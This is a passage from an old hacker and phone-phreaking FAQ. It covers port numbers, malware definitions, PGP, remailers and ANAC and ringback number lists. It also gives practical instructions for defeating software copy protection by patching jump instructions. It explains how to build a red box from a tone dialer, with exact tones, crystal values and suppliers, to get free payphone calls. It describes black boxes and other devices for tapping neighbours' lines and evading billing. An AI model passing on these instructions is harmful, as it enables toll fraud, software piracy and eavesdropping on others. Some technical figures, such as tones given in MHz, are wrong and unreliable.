  2569. www-dev         2784/udp   world wide web - development
  2570. NSWS            3049/tcp
  2571. NSWS            3049/ddddp
  2572. rfa             4672/tcp   remote file access server
  2573. rfa             4672/udp   remote file access server
  2574. commplex-main   5000/tcp
  2575. commplex-main   5000/udp
  2576. commplex-link   5001/tcp
  2577. commplex-link   5001/udp
  2578. rfe             5002/tcp   radio free ethernet
  2579. rfe             5002/udp   radio free ethernet
  2580. rmonitor_secure 5145/tcp
  2581. rmonitor_secure 5145/udp
  2582. padl2sim        5236/tcp
  2583. padl2sim        5236/udp
  2584. sub-process     6111/tcp   HP SoftBench Sub-Process Control
  2585. sub-process     6111/udp   HP SoftBench Sub-Process Control
  2586. xdsxdm          6558/udp
  2587. xdsxdm          6558/tcp
  2588. afs3-fileserver 7000/tcp   file server itself
  2589. afs3-fileserver 7000/udp   file server itself
  2590. afs3-callback   7001/tcp   callbacks to cache managers
  2591. afs3-callback   7001/udp   callbacks to cache managers
  2592. afs3-prserver   7002/tcp   users & groups database
  2593. afs3-prserver   7002/udp   users & groups database
  2594. afs3-vlserver   7003/tcp   volume location database
  2595. afs3-vlserver   7003/udp   volume location database
  2596. afs3-kaserver   7004/tcp   AFS/Kerberos authentication service
  2597. afs3-kaserver   7004/udp   AFS/Kerberos authentication service
  2598. afs3-volser     7005/tcp   volume managment server
  2599. afs3-volser     7005/udp   volume managment server
  2600. afs3-errors     7006/tcp   error interpretation service
  2601. afs3-errors     7006/udp   error interpretation service
  2602. afs3-bos        7007/tcp   basic overseer process
  2603. afs3-bos        7007/udp   basic overseer process
  2604. afs3-update     7008/tcp   server-to-server updater
  2605. afs3-update     7008/udp   server-to-server updater
  2606. afs3-rmtsys     7009/tcp   remote cache manager service
  2607. afs3-rmtsys     7009/udp   remote cache manager service
  2608. man             9535/tcp
  2609. man             9535/udp
  2610. isode-dua       17007/tcp
  2611. isode-dua       17007/udp
  2612.  
  2613.  
  2614. 23. What is a trojan/worm/virus/logic bomb?
  2615.  
  2616. This FAQ answer is excerpted from: Computer Security Basics
  2617.                                    by Deborah Russell
  2618.                                    and G.T. Gengemi Sr.
  2619.  
  2620. Trojan:     An independent program that appears to perform a useful
  2621.             function but that hides another unauthorized program
  2622.             inside it.  When an authorized user performs the apparent
  2623.             function, the trojan horse performs the unauthorized
  2624.             function as well (often usurping the privileges of the
  2625.             user).
  2626.  
  2627. Virus:      A code fragment (not an independent program) that
  2628.             reproduces by attaching to another program.  It may damage
  2629.             data directly, or it may degrade system performance by
  2630.             taking over system resources which are then not available
  2631.             to authorized users.
  2632.  
  2633. Worm:       An independent program that reproduces by copying itself
  2634.             from one system to another, usually over a network.  Like
  2635.             a virus, a worm may damage data directly, or it may
  2636.             degrade system performance by tying up system resources and
  2637.             even shutting down a network.
  2638.  
  2639. Logic Bomb: A method for releasing a system attack of some kind.  It
  2640.             is triggered when a particular condition (e.g., a certain
  2641.             date or system operation) occurs.
  2642.  
  2643.  
  2644. 24. How can I protect myself from virii and such?
  2645.  
  2646. Always write protect your floppy disks when you are not purposefully
  2647. writing to them.
  2648.  
  2649. Use ATTRIB to make all of your EXE and COM files read only.  This will
  2650. protect you from many poorly written viruses.
  2651.  
  2652. Scan any software that you receive with a recent copy of a good virus
  2653. scanner.  The best virus scanner currently available for DOS is F-Prot
  2654. by Fridrik Skulason.  The current version is FP-215.  It is best to
  2655. use more than one virus scanner.  That will decrease your chances of
  2656. missing a virus.
  2657.  
  2658. Backup regularly, and keep several generations of backups on hand.
  2659. If you always backup over your last backup, you may find yourself with
  2660. an infected backup tape.
  2661.  
  2662.  
  2663. 25. What is Cryptoxxxxxxx?
  2664.  
  2665. This FAQ answer is excerpted from: Computer Security Basics
  2666.                                    by Deborah Russell
  2667.                                    and G.T. Gengemi Sr.
  2668.  
  2669. A message is called either plaintext or cleartext.  The process of
  2670. disguising a message in such a way as to hide its substance is called
  2671. encryption.  An encrypted message is called ciphertext.  The process
  2672. of turning ciphertext back into plaintext is called decryption.
  2673.  
  2674. The art and science of keeping messages secure is called cryptography,
  2675. and it is practiced by cryptographers.  Cryptanalysts are
  2676. practitioners of cryptanalysis, the art and science of breaking
  2677. ciphertext, i.e. seeing through the disguise.  The branch of
  2678. mathematics embodying both cryptography and cryptanalysis is called
  2679. cryptology, and it's practitioners are called cryptologists.
  2680.  
  2681.  
  2682. 26. What is PGP?
  2683.  
  2684. This FAQ answer is excerpted from: PGP(tm) User's Guide
  2685.                                    Volume I: Essential Topics
  2686.                                    by Philip Zimmermann
  2687.  
  2688. PGP(tm) uses public-key encryption to protect E-mail and data files.
  2689. Communicate securely with people you've never met, with no secure
  2690. channels needed for prior exchange of keys.  PGP is well featured and
  2691. fast, with sophisticated key management, digital signatures, data
  2692. compression, and good ergonomic design.
  2693.  
  2694. Pretty Good(tm) Privacy (PGP), from Phil's Pretty Good Software, is a
  2695. high security cryptographic software application for MS-DOS, Unix,
  2696. VAX/VMS, and other computers.  PGP allows people to exchange files or
  2697. messages with privacy, authentication, and convenience.  Privacy means
  2698. that only those intended to receive a message can read it.
  2699. Authentication means that messages that appear to be from a particular
  2700. person can only have originated from that person. Convenience means
  2701. that privacy and authentication are provided without the hassles of
  2702. managing keys associated with conventional cryptographic software.  No
  2703. secure channels are needed to exchange keys between users, which makes
  2704. PGP much easier to use.  This is because PGP is based on a powerful
  2705. new technology called "public key" cryptography.
  2706.  
  2707. PGP combines the convenience of the Rivest-Shamir-Adleman (RSA)
  2708. public key cryptosystem with the speed of conventional cryptography,
  2709. message digests for digital signatures, data compression before
  2710. encryption, good ergonomic design, and sophisticated key management.
  2711. And PGP performs the public-key functions faster than most other
  2712. software implementations.  PGP is public key cryptography for the
  2713. masses.
  2714.  
  2715.  
  2716. 27. What is Tempest?
  2717.  
  2718. Tempest stands for Transient Electromagnetic Pulse Surveillance
  2719. Technology.
  2720.  
  2721. Computers and other electronic equipment release interference to their
  2722. surrounding environment.  You may observe this by placing two video
  2723. monitors close together.  The pictures will behave erratically until
  2724. you space them apart.
  2725.  
  2726. Although most of the time these emissions are simply annoyances, they
  2727. can sometimes be very helpful.  Suppose we wanted to see what project
  2728. a target was working on.  We could sit in a van outside her office and
  2729. use sensitive electronic equipment to attempt to pick up and decipher
  2730. the emanations from her video monitor.
  2731.  
  2732. Our competitor, however, could shield the emanations from her
  2733. equipment or use equipment without strong emanations.
  2734.  
  2735. Tempest is the US Government program for evaluation and endorsement
  2736. of electronic equipment that is safe from eavesdropping.
  2737.  
  2738.  
  2739. 28. What is an anonymous remailer?
  2740.  
  2741. An anonymous remailer is a system on the Internet that allows you to
  2742. send e-mail anonymously or post messages to Usenet anonymously.
  2743.  
  2744. You apply for an anonymous ID at the remailer site.  Then, when you
  2745. send a message to the remailer, it sends it out from your anonymous ID
  2746. at the remailer.  No one reading the post will know your real account
  2747. name or host name.  If someone sends a message to your anonymous ID,
  2748. it will be forwarded to your real account by the remailer.
  2749.  
  2750.  
  2751. 29. What are the addresses of some anonymous remailers?
  2752.  
  2753. The most popular and stable anonymous remailer is anon.penet.fi,
  2754. operated by Johan Helsingus.  To obtain an anonymous ID, mail
  2755. ping@anon.penet.fi.  For assistance is obtaining an anonymous account
  2756. at penet, mail help@anon.penet.fi.
  2757.  
  2758. To see a list on anonymous remailers, finger
  2759. remailer-list@kiwi.cs.berkeley.edu.
  2760.  
  2761.  
  2762. 30. How do I defeat Copy Protection?
  2763.  
  2764. There are two common methods of defeating copy protection.  The first
  2765. is to use a program that removes copy protection.  Popular programs
  2766. that do this are CopyIIPC from Central Point Software and CopyWrite
  2767. from Quaid Software.  The second method involves patching the copy
  2768. protected program.  For popular software, you may be able to locate a
  2769. ready made patch.  You can them apply the patch using any hex editor,
  2770. such as debug or the Peter Norton's DiskEdit.  If you cannot, you must
  2771. patch the software yourself.
  2772.  
  2773. Writing a patch requires a debugger, such as Soft-Ice or Sourcer.  It
  2774. also requires some knowledge of assembly language.  Load the protected
  2775. program under the debugger and watch for it to check the protection
  2776. mechanism.  When it does, change that portion of the code.  The code
  2777. can be changed from JE (Jump on Equal) or JNE (Jump On Not Equal) to
  2778. JMP (Jump Unconditionally).  Or the code may simply be replaced with
  2779. NOP (No Operation) instructions.
  2780.  
  2781.  
  2782. 31. What is 127.0.0.1?
  2783.  
  2784. 127.0.0.1 is a loopback network connection.  If you telnet, ftp, etc...
  2785. to it you are connected to your own machine.
  2786.  
  2787.  
  2788.  
  2789.  
  2790. Section B: Telephony
  2791. ~~~~~~~~~~~~~~~~~~~~
  2792.  
  2793. 01. What is a Red Box?
  2794.  
  2795. When a coin is inserted into a payphone, the payphone emits a set of
  2796. tones to ACTS (Automated Coin Toll System).  Red boxes work by fooling
  2797. ACTS into believing you have actually put money into the phone.  The
  2798. red box simply plays the ACTS tones into the telephone microphone.
  2799. ACTS hears those tones, and allows you to place your call.  The actual
  2800. tones are:
  2801.  
  2802. Nickel Signal      1700+2200  0.060s on
  2803. Dime Signal        1700+2200  0.060s on, 0.060s off, twice repeating
  2804. Quarter Signal     1700+2200  33ms on, 33ms off, 5 times repeating
  2805.  
  2806.  
  2807. 02. How do I build a Red Box?
  2808.  
  2809. Red boxes are commonly manufactured from modified Radio Shack tone
  2810. dialers, Hallmark greeting cards, or made from scratch from readily
  2811. available electronic components.
  2812.  
  2813. To make a Red Box from a Radio Shack 43-141 or 43-146 tone dialer,
  2814. open the dialer and replace the crystal with a new one.
  2815. The purpose of the new crystal is to cause the * button on your tone
  2816. dialer to create a 1700Mhz and 2200Mhz tone instead of the original
  2817. 941Mhz and 1209Mhz tones.  The exact value of the replacement crystal
  2818. should be 6.466806 to create a perfect 1700Mhz tone and 6.513698 to
  2819. create a perfect 2200mhz tone. A crystal close to those values will
  2820. create a tone that easily falls within the loose tolerances of ACTS.
  2821. The most popular choice is the 6.5536Mhz crystal, because it is the
  2822. eaiest to procure.  The old crystal is the large shiny metal component
  2823. labeled "3.579545Mhz."  When you are finished replacing the crystal,
  2824. program the P1 button with five *'s.  That will simulate a quarter
  2825. tone each time you press P1.
  2826.  
  2827.  
  2828. 03. Where can I get a 6.5536Mhz crystal?
  2829.  
  2830. Your best bet is a local electronics store.  Radio Shack sells them,
  2831. but they are overpriced and the store must order them in.  This takes
  2832. approximately two weeks.  In addition, many Radio Shack employees do
  2833. not know that this can be done.
  2834.  
  2835. Or, you could order the crystal mail order.  This introduces Shipping
  2836. and Handling charges, which are usually much greater than the price of
  2837. the crystal.  It's best to get several people together to share the
  2838. S&H cost.  Or, buy five or six yourself and sell them later.  Some of
  2839. the places you can order crystals are:
  2840.  
  2841. Digi-Key
  2842. 701 Brooks Avenue South
  2843. P.O. Box 677
  2844. Thief River Falls, MN 56701-0677
  2845. (80)344-4539
  2846. Part Number:X415-ND    /* Note: 6.500Mhz and only .197 x .433 x .149! */
  2847. Part Number:X018-ND
  2848.  
  2849. JDR Microdevices:
  2850. 2233 Branham Lane
  2851. San Jose, CA 95124
  2852. (800)538-5000
  2853. Part Number: 6.5536MHZ
  2854.  
  2855. Tandy Express Order Marketing
  2856. 401 NE 38th Street
  2857. Fort Worth, TX 76106
  2858. (800)241-8742
  2859. Part Number: 10068625
  2860.  
  2861.  
  2862. 04. Which payphones will a Red Box work on?
  2863.  
  2864. Red Boxes will work on TelCo owned payphones, but not on COCOT's
  2865. (Customer Owned Coin Operated Telephones).
  2866.  
  2867. Red boxes work by fooling ACTS (Automated Coin Toll System) into
  2868. believing you have put money into the pay phone.  ACTS is the
  2869. telephone company software responsible for saying "Please deposit XX
  2870. cents" and listening for the coins being deposited.
  2871.  
  2872. COCOT's do not use ACTS.  On a COCOT, the pay phone itself is
  2873. responsible for determining what coins have been inserted.
  2874.  
  2875.  
  2876. 05. How do I make local calls with a Red Box?
  2877.  
  2878. Payphones do not use ACTS for local calls.  To use your red box for
  2879. local calls, you have to fool ACTS into getting involved in the call.
  2880.  
  2881. One way to do this, in some areas, is by dialing 10288-xxx-xxxx.  This
  2882. makes your call a long distance call, and brings ACTS into the
  2883. picture.
  2884.  
  2885. In other areas, you can call Directory Assistance and ask for the
  2886. number of the person you are trying to reach.  The operator will give
  2887. you the number and then you will hear a message similar to "Your call
  2888. can be completed automatically for an additional 35 cents."  When this
  2889. happens, you can then use ACTS tones.
  2890.  
  2891.  
  2892. 06. What is a Blue Box?
  2893.  
  2894. Blue boxes use a 2600hz tone to size control of telephone switches
  2895. that use in-band signalling.  The caller may then access special
  2896. switch functions, with the usual purpose of making free long distance
  2897. phone calls, using the tones provided by the Blue Box.
  2898.  
  2899.  
  2900. 07. Do Blue Boxes still work?
  2901.  
  2902. Blue Boxes still work in areas using in band signalling.  Modern phone
  2903. switches use out of band signalling.  Nothing you send over the voice
  2904. portion of bandwidth can control the switch.
  2905.  
  2906.  
  2907. 08. What is a Black Box?
  2908.  
  2909. A Black Box is a 1.8k ohm resistor placed across your phone line to
  2910. cause the phone company equipment to be unable to detect that you have
  2911. answered your telephone.  People who call you will then not be billed
  2912. for the telephone call.  Black boxes do not work under ESS.
  2913.  
  2914.  
  2915. 09. What do all the colored boxes do?
  2916.  
  2917. Acrylic      Steal Three-Way-Calling, Call Waiting and programmable
  2918.              Call Forwarding on old 4-wire phone systems
  2919. Aqua         Drain the voltage of the FBI lock-in-trace/trap-trace
  2920. Beige        Lineman's hand set
  2921. Black        Allows the calling party to not be billed for the call
  2922.              placed
  2923. Blast        Phone microphone amplifier
  2924. Blotto       Supposedly shorts every fone out in the immediate area
  2925. Blue         Emulate a true operator by seizing a trunk with a 2600hz
  2926.              tone
  2927. Brown        Create a party line from 2 phone lines
  2928. Bud          Tap into your neighbors phone line
  2929. Chartreuse   Use the electricity from your phone line
  2930. Cheese       Connect two phones to create a diverter
  2931. Chrome       Manipulate Traffic Signals by Remote Control
  2932. Clear        A telephone pickup coil and a small amp use to make free
  2933.              calls on Fortress Phones
  2934. Color        Line activated telephone recorder
  2935. Copper       Cause crosstalk interference on an extender
  2936. Crimson      Hold button
  2937. Dark         Re-route outgoing or incoming calls to another phone
  2938. Dayglo       Connect to your neighbors phone line
  2939. Divertor     Re-route outgoing or incoming calls to another phone
  2940. DLOC         Create a party line from 2 phone lines
  2941. Gold         Trace calls, tell if the call is being traced, and can
  2942.              change a trace
  2943. Green        Emulate the Coin Collect, Coin Return, and Ringback tones
  2944. Infinity     Remotely activated phone tap
  2945. Jack         Touch-Tone key pad
  2946. Light        In-use light
  2947. Lunch        AM transmitter
  2948. Magenta      Connect a remote phone line to another remote phone line
  2949. Mauve        Phone tap without cutting into a line
  2950. Neon         External microphone
  2951. Noise        Create line noise
  2952. Olive        External ringer
  2953. Party        Create a party line from 2 phone lines
  2954. Pearl        Tone generator
  2955. Pink         Create a party line from 2 phone lines
  2956. Purple       Telephone hold button
  2957. Rainbow      Kill a trace by putting 120v into the phone line (joke)
  2958. Razz         Tap into your neighbors phone
  2959. Red          Make free phone calls from pay phones by generating
  2960.              quarter tones
  2961. Rock         Add music to your phone line
  2962. Scarlet      Cause a neighbors phone line to have poor reception
  2963. Silver       Create the DTMF tones for A, B, C and D
  2964. Static       Keep the voltage on a phone line high
  2965. Switch       Add hold, indicator lights, conferencing, etc..
  2966. Tan          Line activated telephone recorder
  2967. Tron         Reverse the phase of power to your house, causing your
  2968.              electric meter to run slower
  2969. TV Cable     "See" sound waves on your TV
  2970. Urine        Create a capacitative disturbance between the ring and
  2971.              tip wires in another's telephone headset
  2972. Violet       Keep a payphone from hanging up
  2973. White        Portable DTMF keypad
  2974. Yellow       Add an extension phone
  2975.  
  2976. Box schematics may be retrieved from these FTP sites:
  2977.  
  2978. ftp.netcom.com          /pub/va/vandal                  (DnA)
  2979. ftp.winternet.com       /users/craigb                   (H/P)
  2980.  
  2981.  
  2982. 10. What is an ANAC number?
  2983.  
  2984. An ANAC (Automatic Number Announcement Circuit) number is a telephone
  2985. number that plays back the number of the telephone that called it.
  2986. ANAC numbers are convenient if you want to know the telephone number
  2987. of a pair of wires.
  2988.  
  2989.  
  2990. 11. What is the ANAC number for my area?
  2991.  
  2992. How to find your ANAC number:
  2993.  
  2994. Look up your NPA (Area Code) and try the number listed for it. If that
  2995. fails, try 1 plus the number listed for it.  If that fails, try the
  2996. common numbers like 311, 958 and 200-222-2222.  If you find the ANAC
  2997. number for your area, please let us know.
  2998.  
  2999. Note that many times the ANAC number will vary for different switches
  3000. in the same city.  The geographic naming on the list is not intended
  3001. to be an accurate reference for coverage patterns, it is for
  3002. convenience only.
  3003.  
  3004. Many companies operate 800 number services which will read back to you
  3005. the number from which you are calling.  Many of these require
  3006. navigating a series of menus to get the phone number you are looking
  3007. for.
  3008.  
  3009. (800)238-4959   A voice mail system
  3010. (800)328-2630   A phone sex line
  3011. (800)568-3197   Info Access Telephone Company's Automated Blocking Line
  3012. (800)571-8859   A phone sex line
  3013. (800)692-6447   (800)MY-ANI-IS
  3014. (800)769-3766   Duke Power Company Automated Outage System
  3015.  
  3016. An non-800 ANAC that works nationwide is 404-988-9664.  The one catch
  3017. with this number is that it must be dialed with the AT&T Carrier
  3018. Access Code 10732.
  3019.  
  3020. Another non-800 nationwide ANAC is Glen Robert of Full Disclosure
  3021. Magazine's number, 10555-1-708-356-9646.
  3022.  
  3023. Please use local ANAC numbers if you can, as abuse or overuse kills
  3024. 800 ANAC numbers.
  3025.  
  3026.  
  3027. NPA  ANAC number      Comments
  3028. ---  ---------------  ---------------------------------------------
  3029. 201  958              Hackensack/Jersey City/Newark/Paterson, NJ
  3030. 202  811              District of Columbia
  3031. 203  960              CT (All)
  3032. 203  970              CT (All)
  3033. 205  908-222-2222     Birmingham, AL
  3034. 206  411              WA (Not US West)
  3035. 207  958              ME (All)
  3036. 209  830-2121         Stockton, CA
  3037. 209  211-9779         Stockton, CA
  3038. 212  958              Manhattan, NY
  3039. 213  114              Los Angeles, CA
  3040. 213  1223             Los Angeles, CA (Some 1AESS switches)
  3041. 213  211-2345         Los Angeles, CA (English response)
  3042. 213  211-2346         Los Angeles, CA (DTMF response)
  3043. 213  61056            Los Angeles, CA
  3044. 214  570              Dallas, TX
  3045. 214  790              Dallas, TX (GTE)
  3046. 214  970-222-2222     Dallas, TX
  3047. 214  970-611-1111     Dallas, TX (Southwestern Bell)
  3048. 215  410-xxxx         Philadelphia, PA
  3049. 215  511              Philadelphia, PA
  3050. 215  958              Philadelphia, PA
  3051. 217  200-xxx-xxxx     Champaign-Urbana/Springfield, IL
  3052. 219  550              Gary/Hammond/Michigan City/Southbend, IN
  3053. 219  559              Gary/Hammond/Michigan City/Southbend, IN
  3054. 301  958-9968         Hagerstown/Rockville, MD
  3055. 305  200-222-2222     Ft. Lauderdale/Key West/Miami, FL
  3056. 309  200-xxx-xxxx     Peoria/Rock Island, IL
  3057. 310  114              Long Beach, CA (On many GTE switches)
  3058. 310  1223             Long Beach, CA (Some 1AESS switches)
  3059. 310  211-2345         Long Beach, CA (English response)
  3060. 310  211-2346         Long Beach, CA (DTMF response)
  3061. 312  200              Chicago, IL
  3062. 312  290              Chicago, IL
  3063. 312  1-200-8825       Chicago, IL (Last four change rapidly)
  3064. 312  1-200-555-1212   Chicago, IL
  3065. 313  200-200-2002     Ann Arbor/Dearborn/Detroit, MI
  3066. 313  200-222-2222     Ann Arbor/Dearborn/Detroit, MI
  3067. 313  200-xxx-xxxx     Ann Arbor/Dearborn/Detroit, MI
  3068. 313  200200200200200  Ann Arbor/Dearborn/Detroit, MI
  3069. 314  410-xxxx#        Columbia/Jefferson City/St.Louis, MO
  3070. 315  953              Syracuse/Utica, NY
  3071. 315  958              Syracuse/Utica, NY
  3072. 315  998              Syracuse/Utica, NY
  3073. 317  310-222-2222     Indianapolis/Kokomo, IN
  3074. 317  743-1218         Indianapolis/Kokomo, IN
  3075. 401  200-200-4444     RI (All)
  3076. 401  222-2222         RI (All)
  3077. 402  311              Lincoln, NE
  3078. 404  311              Atlanta, GA
  3079. 404  940-xxx-xxxx     Atlanta, GA
  3080. 404  990              Atlanta, GA
  3081. 405  890-7777777      Enid/Oklahoma City, OK
  3082. 405  897              Enid/Oklahoma City, OK
  3083. 407  200-222-2222     Orlando/West Palm Beach, FL
  3084. 408  300-xxx-xxxx     San Jose, CA
  3085. 408  760              San Jose, CA
  3086. 408  940              San Jose, CA
  3087. 409  951              Beaumont/Galveston, TX
  3088. 409  970-xxxx         Beaumont/Galveston, TX
  3089. 410  200-6969         Annapolis/Baltimore, MD
  3090. 410  200-555-1212     Annapolis/Baltimore, MD
  3091. 410  811              Annapolis/Baltimore, MD
  3092. 412  711-6633         Pittsburgh, PA
  3093. 412  711-4411         Pittsburgh, PA
  3094. 412  999-xxxx         Pittsburgh, PA
  3095. 413  958              Pittsfield/Springfield, MA
  3096. 413  200-555-5555     Pittsfield/Springfield, MA
  3097. 414  330-2234         Fond du Lac/Green Bay/Milwaukee/Racine, WI
  3098. 415  200-555-1212     San Francisco, CA
  3099. 415  211-2111         San Francisco, CA
  3100. 415  2222             San Francisco, CA
  3101. 415  640              San Francisco, CA
  3102. 415  760-2878         San Francisco, CA
  3103. 415  7600-2222        San Francisco, CA
  3104. 419  311              Toledo, OH
  3105. 502  2002222222       Frankfort/Louisville/Paducah/Shelbyville, KY
  3106. 502  997-555-1212     Frankfort/Louisville/Paducah/Shelbyville, KY
  3107. 503  611              Portland, OR
  3108. 503  999              Portland, OR (GTE)
  3109. 504  99882233         Baton Rouge/New Orleans, LA
  3110. 504  201-269-1111     Baton Rouge/New Orleans, LA
  3111. 504  998              Baton Rouge/New Orleans, LA
  3112. 504  99851-0000000000 Baton Rouge/New Orleans, LA
  3113. 508  958              Fall River/New Bedford/Worchester, MA
  3114. 508  200-222-1234     Fall River/New Bedford/Worchester, MA
  3115. 508  200-222-2222     Fall River/New Bedford/Worchester, MA
  3116. 508  26011            Fall River/New Bedford/Worchester, MA
  3117. 509  560              Spokane/Walla Walla/Yakima, WA
  3118. 512  830              Austin/Corpus Christi, TX
  3119. 512  970-xxxx         Austin/Corpus Christi, TX
  3120. 515  5463             Des Moines, IA
  3121. 515  811              Des Moines, IA
  3122. 516  958              Hempstead/Long Island, NY
  3123. 516  968              Hempstead/Long Island, NY
  3124. 517  200-222-2222     Bay City/Jackson/Lansing, MI
  3125. 517  200200200200200  Bay City/Jackson/Lansing, MI
  3126. 518  997              Albany/Schenectady/Troy, NY
  3127. 518  998              Albany/Schenectady/Troy, NY
  3128. 602  593-0809         Phoenix, AZ
  3129. 602  593-6017         Phoenix, AZ
  3130. 602  593-7451         Phoenix, AZ
  3131. 603  200-222-2222     NH (All)
  3132. 606  997-555-1212     Ashland/Winchester, KY
  3133. 606  711              Ashland/Winchester, KY
  3134. 607  993              Binghamton/Elmira, NY
  3135. 609  958              Atlantic City/Camden/Trenton/Vineland, NJ
  3136. 610  958              Allentown/Reading, PA
  3137. 612  511              Minneapolis/St.Paul, MN
  3138. 615  200200200200200  Chatanooga/Knoxville/Nashville, TN
  3139. 615  2002222222       Chatanooga/Knoxville/Nashville, TN
  3140. 615  830              Nashville, TN
  3141. 616  200-222-2222     Battle Creek/Grand Rapids/Kalamazoo, MI
  3142. 617  200-222-1234     Boston, MA
  3143. 617  200-222-2222     Boston, MA
  3144. 617  200-444-4444     Boston, MA (Woburn, MA)
  3145. 617  220-2622         Boston, MA
  3146. 617  958              Boston, MA
  3147. 618  200-xxx-xxxx     Alton/Cairo/Mt.Vernon, IL
  3148. 618  930              Alton/Cairo/Mt.Vernon, IL
  3149. 703  811              Alexandria/Arlington/Roanoke, VA
  3150. 708  1-200-555-1212   Chicago/Elgin, IL
  3151. 708  1-200-8825       Chicago/Elgin, IL (Last four change rapidly)
  3152. 708  356-9646         Chicago/Elgin, IL
  3153. 713  970-xxxx         Houston, TX
  3154. 714  114              Anaheim, CA (GTE)
  3155. 714  211-2121         Anaheim, CA (PacBell)
  3156. 714  211-2222         Anaheim, CA (Pacbell)
  3157. 716  511              Buffalo/Niagara Falls/Rochester, NY (Rochester Tel)
  3158. 717  958              Harrisburg/Scranton/Wilkes-Barre, PA
  3159. 718  958              Bronx/Brooklyn/Queens/Staten Island, NY
  3160. 802  2-222-222-2222   Vermont (All)
  3161. 802  200-222-2222     Vermont (All)
  3162. 805  211-2345         Bakersfield/Santa Barbara, CA
  3163. 805  211-2346         Bakersfield/Santa Barbara, CA (Returns DTMF)
  3164. 805  830              Bakersfield/Santa Barbara, CA
  3165. 806  970-xxxx         Amarillo/Lubbock, TX
  3166. 810  200200200200200  Flint/Pontiac/Southfield/Troy, MI
  3167. 812  410-555-1212     Evansville, IN
  3168. 813  311              Ft. Meyers/St. Petersburg/Tampa, FL
  3169. 815  200-xxx-xxxx     La Salle/Rockford, IL
  3170. 815  290              La Salle/Rockford, IL
  3171. 817  211              Ft. Worth/Waco, TX
  3172. 817  970-611-1111     Ft. Worth/Waco, TX  (Southwestern Bell)
  3173. 818  1223             Pasadena, CA (Some 1AESS switches)
  3174. 818  211-2345         Pasadena, CA (English response)
  3175. 818  211-2346         Pasadena, CA (DTMF response)
  3176. 906  1-200-222-2222   Marquette/Sault Ste. Marie, MI
  3177. 908  958              New Brunswick, NJ
  3178. 910  200              Fayetteville/Greensboro/Raleigh/Winston-Salem, NC
  3179. 910  311              Fayetteville/Greensboro/Raleigh/Winston-Salem, NC
  3180. 910  988              Fayetteville/Greensboro/Raleigh/Winston-Salem, NC
  3181. 914  990-1111         Peekskill/Poughkeepsie/White Plains/Yonkers, NY
  3182. 915  970-xxxx         Abilene/El Paso, TX
  3183. 919  200              Durham, NC
  3184. 919  711              Durham, NC
  3185.  
  3186. Canada:
  3187. 204  644-xxxx         Manitoba
  3188. 306  115              Saskatchewan, Canada
  3189. 403  311              Alberta, Yukon and N.W. Territory
  3190. 403  908-222-2222     Alberta, Yukon and N.W. Territory
  3191. 403  999              Alberta, Yukon and N.W. Territory
  3192. 416  997-xxxx         Toronto, Ontario
  3193. 514  320-xxxx         Montreal, Quebec
  3194. 519  320-xxxx         London, Ontario
  3195. 604  1116             British Columbia, Canada
  3196. 604  1211             British Columbia, Canada
  3197. 604  211              British Columbia, Canada
  3198. 613  320-2232         Ottawa, Ontario
  3199. 705  320-4567         North Bay/Saulte Ste. Marie, Ontario
  3200.  
  3201. Australia:
  3202. +61  03-552-4111      Victoria 03 area
  3203. +612 19123            All major capital cities
  3204.  
  3205. United Kingdom:
  3206. 175
  3207.  
  3208.  
  3209. 12. What is a ringback number?
  3210.  
  3211. A ringback number is a number that you call that will immediately
  3212. ring the telephone from which it was called.
  3213.  
  3214. In most instances you must call the ringback number, quickly hang up
  3215. the phone for just a short moment and then let up on the switch, you
  3216. will then go back off hook and hear a different tone.  You may then
  3217. hang up.  You will be called back seconds later.
  3218.  
  3219.  
  3220. 13. What is the ringback number for my area?
  3221.  
  3222. An 'x' means insert those numbers from the phone number from which you
  3223. are calling.  A '?' means that the number varies from switch to switch
  3224. in the area, or changes from time to time.  Try all possible
  3225. combinations.
  3226.  
  3227. If the ringback for your NPA is not listed, try common ones such as
  3228. 954, 957 and 958.  Also, try using the numbers listed for other NPA's
  3229. served by your telephone company.
  3230.  
  3231. 201  55?-xxxx         Hackensack/Jersey City/Newark/Paterson, NJ
  3232. 202  958-xxxx         District of Columbia
  3233. 203  991-xxxx         CT (All)
  3234. 213  1-95x-xxxx       Los Angeles, CA
  3235. 219  571-xxx-xxxx     Gary/Hammond/Michigan City/Southbend, IN
  3236. 219  777-xxx-xxxx     Gary/Hammond/Michigan City/Southbend, IN
  3237. 301  579-xxxx         Hagerstown/Rockville, MD
  3238. 301  958-xxxx         Hagerstown/Rockville, MD
  3239. 303  99X-xxxx         Grand Junction, CO
  3240. 305  999-xxxx         Ft. Lauderdale/Key West/Miami, FL
  3241. 312  511-xxxx         Chicago, IL
  3242. 312  511-xxx-xxxx     Chicago, IL
  3243. 312  57?-xxxx         Chicago, IL
  3244. 315  98x-xxxx         Syracuse/Utica, NY
  3245. 317  777-xxxx         Indianapolis/Kokomo, IN
  3246. 317  yyy-xxxx         Indianapolis/Kokomo, IN (y=3rd digit of phone number)
  3247. 319  79x-xxxx         Davenport/Dubuque, Iowa
  3248. 401  98?-xxxx         RI (All)
  3249. 404  450-xxxx         Atlanta, GA
  3250. 407  988-xxxx         Orlando/West Palm Beach, FL
  3251. 412  985-xxxx         Pittsburgh, PA
  3252. 414  977-xxxx         Fond du Lac/Green Bay/Milwaukee/Racine, WI
  3253. 414  978-xxxx         Fond du Lac/Green Bay/Milwaukee/Racine, WI
  3254. 415  350-xxxx         San Francisco, CA
  3255. 417  551-xxxx         Joplin/Springfield, MO
  3256. 501  721-xxx-xxxx     AR (All)
  3257. 502  988              Frankfort/Louisville/Paducah/Shelbyville, KY
  3258. 504  99x-xxxx         Baton Rouge/New Orleans, LA
  3259. 504  9988776655       Baton Rouge/New Orleans, LA
  3260. 505  59?-xxxx         New Mexico (All)
  3261. 512  95X-xxxx         Austin, TX
  3262. 513  99?-xxxx         Cincinnati/Dayton, OH
  3263. 516  660-xxx-xxxx     Hempstead/Long Island, NY
  3264. 601  777-xxxx         MS (All)
  3265. 609  55?-xxxx         Atlantic City/Camden/Trenton/Vineland, NJ
  3266. 612  511              Minneapolis/St.Paul, MN
  3267. 612  999-xxx-xxxx     Minneapolis/St.Paul, MN
  3268. 615  930-xxxx         Chatanooga/Knoxville/Nashville, TN
  3269. 616  946-xxxx         Battle Creek/Grand Rapids/Kalamazoo, MI
  3270. 619  331-xxxx         San Diego, CA
  3271. 619  332-xxxx         San Diego, CA
  3272. 703  958-xxxx         Alexandria/Arlington/Roanoke, VA
  3273. 714  330?             Anaheim, CA (GTE)
  3274. 714  33?-xxxx         Anaheim, CA (PacBell)
  3275. 716  981-xxxx         Rochester, NY (Rochester Tel)
